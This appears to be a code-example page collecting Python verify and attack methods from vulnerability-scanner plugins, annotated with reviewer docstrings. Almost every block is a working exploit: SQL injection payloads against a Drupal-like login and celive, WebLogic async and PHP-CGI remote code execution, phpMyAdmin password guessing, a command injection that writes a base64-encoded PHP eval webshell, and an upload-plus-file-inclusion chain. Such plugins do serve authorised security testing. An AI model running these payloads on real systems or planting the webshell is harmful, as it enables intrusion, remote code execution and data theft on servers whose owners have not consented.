Esempio n. 24
    def _verify(self, verify=True):
        """Verify mode: error-based SQL injection through the ``name[]`` array of
        a login form (``form_id=user_login_block`` suggests Drupal -- confirm).

        The injected key selects ``md5(715890248135)``; the constant hash in the
        response body is the positive signal.  ``verify`` is accepted so the
        ``_attack`` variants can call ``_verify(verify=False)`` but is unused here.
        """
        result = {}
        vul_url = '%s/?q=node&destination=node' % self.url
        payload = {
            'name[0 and (select 1 from (select count(*),concat((select md5(715890248' \
            '135)),floor(rand(0)*2))x from  information_schema.tables group by x' \
            ')a);;#]': 'test',
            'name[0]': 'test2',
            'pass': '******',
            'form_id': 'user_login_block',
        }

        response = req.post(vul_url, data=payload).content
        if 'e4f5fd37a92eb41ba575c81bf0d31591' in response:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url
            result['VerifyInfo']['Payload'] = urllib.urlencode(payload)

        return self.parse_attack(result)
Esempio n. 25
    def _verify(self, verify=True):
        """Verify mode: error-based SQL injection through the ``name[]`` array of
        a login form.  Duplicate of the preceding ``_verify`` (only the
        continuation indentation differs).

        Looks for ``md5(715890248135)`` in the response; ``verify`` is unused.
        """
        result = {}
        vul_url = '%s/?q=node&destination=node' % self.url
        payload = {
            'name[0 and (select 1 from (select count(*),concat((select md5(715890248' \
                '135)),floor(rand(0)*2))x from  information_schema.tables group by x' \
                ')a);;#]': 'test',
            'name[0]': 'test2',
            'pass': '******',
            'form_id': 'user_login_block',
        }

        response = req.post(vul_url, data=payload).content
        if 'e4f5fd37a92eb41ba575c81bf0d31591' in response:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url
            result['VerifyInfo']['Payload'] = urllib.urlencode(payload)

        return self.parse_attack(result)
 def _verify(self):
     """Verify mode for the WebLogic ``/_async/AsyncResponseService`` endpoint.

     Posts ``self.payload1`` (defined elsewhere) formatted with a random
     8-letter flag; on HTTP 202 it fetches
     ``/bea_wls_internal/<flag>.jsp?pwd=s<flag>`` and treats the flag in that
     page as the positive signal, i.e. the payload is expected to write a JSP.

     NOTE(review): ``print(url)`` / ``print(data)`` / ``print(flag_url)`` are
     debug output; ``flag`` is lower-cased after generation, so only the
     lower-case form is searched for.
     """
     result = {}
     filename = "/_async/AsyncResponseService"
     url = self.url.strip('/') + filename
     print(url)
     headers = {'content-type': 'text/xml'}
     flag = "".join(random.choice(string.ascii_letters) for _ in xrange(0, 8))
     flag = flag.lower()
     data = self.payload1.format(flag, flag, flag)
     print(data)
     r = req.post(url, data=data, headers=headers, timeout=7)
     if r.status_code == 202:
         flag_url = self.url.strip('/') + '/bea_wls_internal/{0}.jsp?pwd=s{1}'.format(flag, flag)
         print(flag_url)
         r2 = req.get(flag_url)
         if flag in r2.content:
             result['VerifyInfo'] = {}
             result['VerifyInfo']['url'] = self.url.strip('/') + filename
     return self.parse_output(result)
Esempio n. 27
    def _verify(self):
        """Verify mode for error-based SQL injection in ``/celive/live/header.php``.

        Duplicate of the earlier celive ``_verify`` (dict formatted differently).
        The duplicate-key ``floor(rand(0)*2)`` trick makes the error message
        carry ``md5(233)``, which is the positive signal.

        NOTE(review): calls ``self.parse_result``, unlike the other blocks --
        confirm the base class provides it.
        """
        result = {}
        target = self.url + '/celive/live/header.php'
        post_data = {
            'xajax':
            'LiveMessage',
            'xajaxargs[0][name]':
            "1',(SELECT 1 FROM (select count(*),concat("
            "floor(rand(0)*2),(select md5(233)))a from "
            "information_schema.tables group by a)b),"
            "'','','','1','127.0.0.1','2') #"
        }
        # Send the POST with requests
        response = req.post(target, data=post_data, timeout=10)
        content = response.content
        # e165421110ba03099a1c0393373c5b43 is the value of md5(233)
        if 'e165421110ba03099a1c0393373c5b43' in content:
            result = {'VerifyInfo': {}}
            result['VerifyInfo']['URL'] = target

        return self.parse_result(result)
Esempio n. 28
    def _attack(self):
        """Attack mode: send two array-style parameters (``var1[0]``, ``var2[0]``)
        by GET and by POST and capture a ``<name>{...}`` flag from each body.

        Reads ``self.params['var1']``, ``['var2']`` and ``['name']``.

        NOTE(review): the second default on the next lines assigns ``var1`` when
        ``var2`` is empty (looks like a copy-paste slip), and a missing ``var2``
        then makes the ``+`` below fail.  ``print payload`` is leftover debug
        output; ``params=payload`` passes a pre-built string, so ``req`` is
        trusted not to re-encode it.
        """
        result = {}
        vulurl = self.url
        # TODO;
        if not self.params["var1"]: self.params["var1"] = "a"
        if not self.params["var2"]: self.params["var1"] = "b"
        payload = self.params["var1"] + "[0]=1&" + self.params["var2"] + "[0]=2"
        print payload
        resp = req.get(vulurl, params=payload)
        # Greedy '(.*)' captures up to the last '}' on the line.
        match_result = re.search(self.params['name'] + '{(.*)}', resp.content)
        if match_result:
            result['FlagInfo'] = {}
            result['FlagInfo']['GetFlag'] = self.params[
                'name'] + "{" + match_result.group(1) + "}"
        resp = req.post(vulurl, params=payload)
        match_result = re.search(self.params['name'] + '{(.*)}', resp.content)
        if match_result:
            # Re-creating the dict drops a GetFlag captured above.
            result['FlagInfo'] = {}
            result['FlagInfo']['PostFlag'] = self.params[
                'name'] + "{" + match_result.group(1) + "}"

        return self.parse_attack(result)
Esempio n. 29
 def _verify(self):
     """Verify mode for PHP-CGI argument injection (``?-d allow_url_include=on
     -d auto_prepend_file=php://input``).

     The POST body is a tiny PHP snippet that echoes a random 8-letter flag;
     the flag in ``resp.content`` is the positive signal.  Side effect:
     ``self.url`` is rewritten to include the query string.

     Detection note: a query string beginning with ``?-d`` (``%2dd``) against
     ``index.php`` is the signature.  ``time.sleep(2)`` runs after the
     response has arrived and does not affect the check.
     """
     result = {}
     header = {
         'Accept': '*/*',
         'Accept-Language': 'en',
         'User-Agent':
         'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)',
         'Connection': 'close',
         'Content-Type': 'application/x-www-form-urlencoded',
     }
     payload = '/index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input'
     flag = "".join(
         random.choice(string.ascii_letters) for _ in xrange(0, 8))
     data = '<?php echo "' + flag + '"; ?>'
     self.url = self.url.strip('/') + payload
     resp = req.post(self.url, headers=header, data=data)
     time.sleep(2)
     if flag in resp.content:
         result['VerifyInfo'] = {}
         result['VerifyInfo']['URL'] = self.url
     return self.parse_output(result)
 def _attack(self):
     """Attack mode for the WebLogic ``/_async/AsyncResponseService`` endpoint.

     Posts ``self.payload2`` (defined elsewhere) formatted with a random flag;
     on HTTP 202, ``self.verify_result(flag, cmd)`` (defined elsewhere) is
     expected to return a two-element list: the output of ``whoami`` and the
     URL of a dropped file, which are reported as ``extra`` and ``ShellInfo``.

     NOTE(review): ``cmd`` is only forwarded to ``verify_result``; how it is
     executed is not visible in this block.  The ``ceye.io`` comment below is
     stale here -- no callback domain appears in this method.
     """
     result = {}
     filename = "/_async/AsyncResponseService"
     url = self.url.strip('/') + filename
     cmd = 'whoami'
     headers = {'content-type': 'text/xml'}
     #--ping `whoami`.weblogic.xxxxxx.ceye.io--
     flag = "".join(random.choice(string.ascii_letters) for _ in xrange(0, 8))
     flag = flag.lower()
     data = self.payload2.format(flag)
     r1 = req.post(url, data=data, headers=headers, timeout=7)
     if r1.status_code == 202:
         datalist = self.verify_result(flag, cmd)
         if datalist:
             result['extra'] = {}
             result['extra']['whoami'] = datalist[0]
             result['VerifyInfo'] = {}
             result['VerifyInfo']['url'] = self.url.strip('/') + filename
             result['ShellInfo'] = {}
             result['ShellInfo']['URL'] = datalist[1]
             result['ShellInfo']['Content'] = data
     return self.parse_output(result)
Esempio n. 31
    def _verify(self):
        """Verify mode: phpMyAdmin weak-credential check.

        Locates the login page (``self.url`` or ``/phpmyadmin/index.php``), then
        tries every user/password pair from the two lists and treats any of the
        ``flag_list`` markers of a logged-in page as success.

        NOTE(review): ``target_url`` is only bound inside the ``try``; if neither
        branch matches or the GET raises, the later ``req.post`` raises
        NameError, which the inner ``except Exception: pass`` silently eats on
        every iteration.  The loops do not stop on the first hit.  The
        credentials in ``payload_data`` have been replaced by ``******``
        (redaction artefact), so the f-string-like literal no longer parses as
        the author wrote it.
        """
        result = {}
        flag_list = [
            'src="navigation.php', 'frameborder="0" id="frame_content"',
            'id="li_server_type">', 'class="disableAjax" title='
        ]
        user_list = ['root', 'admin']
        password_list = [
            'root', '123456', '12345678', 'password', 'passwd', '123', 'admin',
            'admin123'
        ]
        try:
            response = req.get(self.url)
            if 'name=\"phpMyAdmin\"' in response.content:
                target_url = str(self.url) + "/index.php"
            else:
                response = req.get(self.url + '/phpmyadmin/index.php')
                if 'input_password' in response.content and 'name="token"' in response.content:
                    target_url = self.url + "/phpmyadmin/index.php"
        except Exception as e:
            # Discovery errors are swallowed; target_url may stay unbound.
            pass

        for user in user_list:
            for password in password_list:
                payload_data = "pma_username="******"&pma_password="******"" \
                               "&server=1&target=index.php&lang=zh_CN&collation_connection=utf8_general_ci"
                try:
                    respond = req.post(target_url, data=payload_data)
                    for flag in flag_list:
                        if flag in respond.content:
                            result['VerifyInfo'] = {}
                            result['VerifyInfo']['URL'] = target_url
                            result['VerifyInfo']['Payload'] = payload_data
                except Exception as e:
                    # print(e)
                    pass
        return self.parse_output(result)
    def _attack(self):
        """Attack mode: command injection through the image-resize path segment.

        Requires ``self.headers['Cookie']`` and ``self.params['username']``;
        uploads an image via ``self.upload_image()`` (defined elsewhere), then
        requests the image URL with the ``300x300`` size replaced by a shell
        command that base64-decodes a PHP one-liner into ``Uan1wS.php``.  The
        file is confirmed by POSTing ``echo strrev(dfgniqsfc);`` and checking
        for the reversed string.

        NOTE(review): the second guard checks ``username`` but its message says
        ``'uid required'``.  The dropped filename is a fixed constant.
        """
        result = {}

        #need Cookie and username and uid
        if not 'Cookie' in self.headers:
            raise Exception('Cookie required')
        if not 'username' in self.params:
            raise Exception('uid required')

        img_url = self.upload_image()
        payload = '300x300||echo%20PD9waHAgZXZhbCgkX1BPU1RbZV0pOz8%2b|base64%20-d%20%3E%20Uan1wS.php%20%23'

        # Session so self.headers (incl. Cookie) apply to the trigger request.
        sess = req.Session()
        sess.headers.update(self.headers)
        sess.get(img_url.replace('300x300', payload))

        #get shell
        resp = req.post('%s/Uan1wS.php' % self.url, data={'e': 'echo strrev(dfgniqsfc);'}).content
        if 'cfsqingfd' in resp:
            result['ShellInfo'] = {}
            result['ShellInfo']['URL'] = '%s/Uan1wS.php' % self.url
            result['ShellInfo']['Content'] = 'e'

        return self.parse_attack(result)
Esempio n. 33
    def _verify(self):
        """Verify mode: unrestricted upload followed by local file inclusion.

        Uploads ``testjpg.jpg`` whose body is a self-deleting PHP snippet via
        ``index.php?ac=common_upfile``, reads the stored filename from the
        response and includes it through ``index.php?d=../../uploadfiles/<name>%00``.
        The ``md5(0x2333333)`` constant in the included output is the positive
        signal.  Same request flow as the ``_attack`` variant on this page.

        NOTE(review): ``self.headers['Content-Type']`` is set with the multipart
        boundary but ``req.post`` is not passed ``headers=`` -- whether ``req``
        applies ``self.headers`` globally is not visible here.  When
        ``check_argv()`` is false the method returns ``None``.
        """
        if self.check_argv():
            result = {}

            # Set the Content-Type header to announce a multipart file upload
            self.headers['Content-Type'] = "multipart/form-data; boundary=----WebKitFormBoundaryMOKvckE0g6qr7jKz"
            # Filename testjpg.jpg; body is <?php echo md5(0x2333333);unlink(__FILE__); ?>
            post_data = "------WebKitFormBoundaryMOKvckE0g6qr7jKz\r\nContent-Disposition: form-data; name=\"files\"; filename=\"testjpg.jpg\"\r\nContent-Type: image/jpeg\r\n\r\n<?php echo md5(0x2333333);unlink(__FILE__); ?>\r\n------WebKitFormBoundaryMOKvckE0g6qr7jKz\r\nContent-Disposition: form-data; name=\"submit\"\r\n\r\n\r\n  \r\n------WebKitFormBoundaryMOKvckE0g6qr7jKz\r\nContent-Disposition: form-data; name=\"type\"\r\n\r\n\r\n------WebKitFormBoundaryMOKvckE0g6qr7jKz\r\nContent-Disposition: form-data; name=\"picWidth\"\r\n\r\n142\r\n------WebKitFormBoundaryMOKvckE0g6qr7jKz\r\nContent-Disposition: form-data; name=\"picHeight\"\r\n\r\n102\r\n------WebKitFormBoundaryMOKvckE0g6qr7jKz\r\nContent-Disposition: form-data; name=\"waterImg\"\r\n\r\n0\r\n------WebKitFormBoundaryMOKvckE0g6qr7jKz--\r\n\r\n"
            # Upload endpoint; this is ordinary application functionality
            post_url = urlparse.urljoin(self.url,'index.php?ac=common_upfile&type=')
            resp = req.post(url=post_url,data=post_data)

            # Extract the stored filename from the upload response
            if resp.status_code == 200:
                match_result = re.search(r'value =\'(.*?)\'',resp.content,re.I | re.M)
                if match_result:
                    # Request the local-file-inclusion URL (null byte truncates the suffix)
                    payload = "../../uploadfiles/" + match_result.group(1) + "%00"
                    vul_url = urlparse.urljoin(self.url,"index.php?d=" + payload)
                    resp = req.get(vul_url)
                    if resp.status_code == 200 and '5a8adb32edd60e0cfb459cfb38093755' in resp.content:
                        result['VerifyInfo'] = {}
                        result['VerifyInfo']['URL'] = vul_url
            return self.parse_attack(result)